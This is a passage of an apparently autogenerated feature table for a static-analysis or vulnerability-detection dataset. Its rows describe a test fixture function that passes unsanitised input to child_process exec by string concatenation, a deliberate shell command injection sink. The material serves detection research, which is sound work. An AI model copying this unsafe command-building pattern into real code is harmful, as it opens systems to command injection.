contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:175:1 | 'arguments' object of anonymous function | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:175:1 | 'arguments' object of anonymous function | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:175:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:175:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:175:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:175:1 | exceptional return of anonymous function | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:175:1 | exceptional return of anonymous function | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:175:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:175:1 | functio ... T OK\\n\\n} | assignedToPropName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:175:1 | functio ... T OK\\n\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:175:1 | functio ... T OK\\n\\n} | contextSurroundingFunctionParameters | (command, name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:175:1 | functio ... T OK\\n\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:175:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:175:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:175:1 | return of anonymous function | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:175:1 | return of anonymous function | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:22:175:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:32:170:38 | command | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:32:170:38 | command | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:32:170:38 | command | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:32:170:38 | command | contextSurroundingFunctionParameters | (command, name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:32:170:38 | command | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:32:170:38 | command | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:32:170:38 | command | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:32:170:38 | command | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:32:170:38 | command | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:32:170:38 | command | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:41:170:44 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:41:170:44 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:41:170:44 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:41:170:44 | name | contextSurroundingFunctionParameters | (command, name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:41:170:44 | name | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:41:170:44 | name | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:41:170:44 | name | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:41:170:44 | name | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:41:170:44 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:170:41:170:44 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:3 | cp | contextSurroundingFunctionParameters | (command, name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:3 | cp | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:3 | cp | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:8 | cp.exec | contextSurroundingFunctionParameters | (command, name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:8 | cp.exec | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:8 | cp.exec | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:27 | cp.exec ... ommand) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:27 | cp.exec ... ommand) | contextSurroundingFunctionParameters | (command, name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:27 | cp.exec ... ommand) | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:27 | cp.exec ... ommand) | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:27 | cp.exec ... ommand) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:27 | exceptional return of cp.exec ... ommand) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:27 | exceptional return of cp.exec ... ommand) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:27 | exceptional return of cp.exec ... ommand) | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:27 | exceptional return of cp.exec ... ommand) | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:2:171:27 | exceptional return of cp.exec ... ommand) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:5:171:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:5:171:8 | exec | contextSurroundingFunctionParameters | (command, name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:5:171:8 | exec | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:5:171:8 | exec | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:5:171:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:10:171:16 | "fo \| " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:10:171:16 | "fo \| " | contextSurroundingFunctionParameters | (command, name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:10:171:16 | "fo \| " | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:10:171:16 | "fo \| " | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:10:171:16 | "fo \| " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:10:171:16 | "fo \| " | stringConcatenatedWith | -endpoint- command | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:10:171:26 | "fo \| " + command | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:10:171:26 | "fo \| " + command | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:10:171:26 | "fo \| " + command | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:10:171:26 | "fo \| " + command | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:10:171:26 | "fo \| " + command | contextSurroundingFunctionParameters | (command, name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:10:171:26 | "fo \| " + command | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:10:171:26 | "fo \| " + command | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:10:171:26 | "fo \| " + command | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:10:171:26 | "fo \| " + command | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:20:171:26 | command | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 